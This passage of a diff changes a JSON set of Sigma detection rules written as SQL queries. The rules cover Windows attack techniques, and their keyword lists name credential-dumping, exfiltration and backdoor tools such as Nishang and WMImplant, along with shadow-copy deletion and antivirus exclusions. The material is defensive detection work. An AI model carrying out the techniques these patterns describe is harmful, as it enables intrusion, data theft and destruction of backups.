"author": "Timur Zinniatullin, oscd.community", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1560" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Highly 
likely if archive operations are done via PowerShell." + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Recurse%' ESCAPE '\\' AND ScriptBlockText LIKE '%|%' ESCAPE '\\' AND ScriptBlockText LIKE '%Compress-Archive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" ], - "filename": "posh_ps_data_compressed.yml" + "filename": "proc_creation_win_reg_service_imagepath_change.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Discovery of a System Time", + "id": "b243b280-65fe-48df-ba07-6ddea7646427", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use of the system utilities to discover system time for legitimate reason" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%time%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' AND CommandLine LIKE '%tz%' ESCAPE '\\')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_remote_time_discovery.yml" }, { - "title": "Clear PowerShell History - PowerShell", - "id": "26b692dc-1722-49b2-b496-a8258aa6371d", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "status": "test", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.003" + "attack.t1574.002" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE 
'%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_clear_powershell_history.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Suspicious Hyper-V Cmdlets", - "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "title": "Powershell Defender Exclusion", + "id": "17769c90-230e-488b-a463-e05c08e9d48f", "status": "experimental", - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "author": "frack113", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.006" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" + "SELECT * FROM 
logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_hyper_v_condlet.yml" + "filename": "proc_creation_win_powershell_defender_exclusion.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsScript", - "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName 
LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" ], - "filename": "posh_ps_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.t1003" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Diagnostics" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", - "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", + "status": "experimental", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Administrative scripts that use the same keywords." 
+ "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmimplant.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Suspicious Get Information for SMB Share", - "id": "95f0643a-ed40-467c-806b-aac9542ec5ab", - "status": "test", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify 
potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "author": "frack113", + "title": "Download Arbitrary Files Via MSOHTMED.EXE", + "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "status": "experimental", + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-smbshare%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_smb_share_reco.yml" + "filename": "proc_creation_win_lolbin_msohtmed_download.yml" }, { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "title": "New User Created Via Net.EXE", + "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "status": "test", + "description": "Identifies the creation of local users via the net.exe command.", + "author": "Endgame, JHasenbusch (adapted to Sigma for 
oscd.community)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_net_user_add.yml" }, { - "title": "Suspicious Process Discovery With Get-Process", - "id": "af4c87ce-bdda-4215-b998-15220772e993", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Get the processes that are running on the local computer.", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.discovery", - "attack.t1057" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": 
[ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_process.yml" - }, - { - "title": "Detected Windows Software Discovery - PowerShell", - "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "status": "experimental", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + }, + { + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.defense_evasion", + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_software_discovery.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Suspicious New-PSDrive to Admin Share", - "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
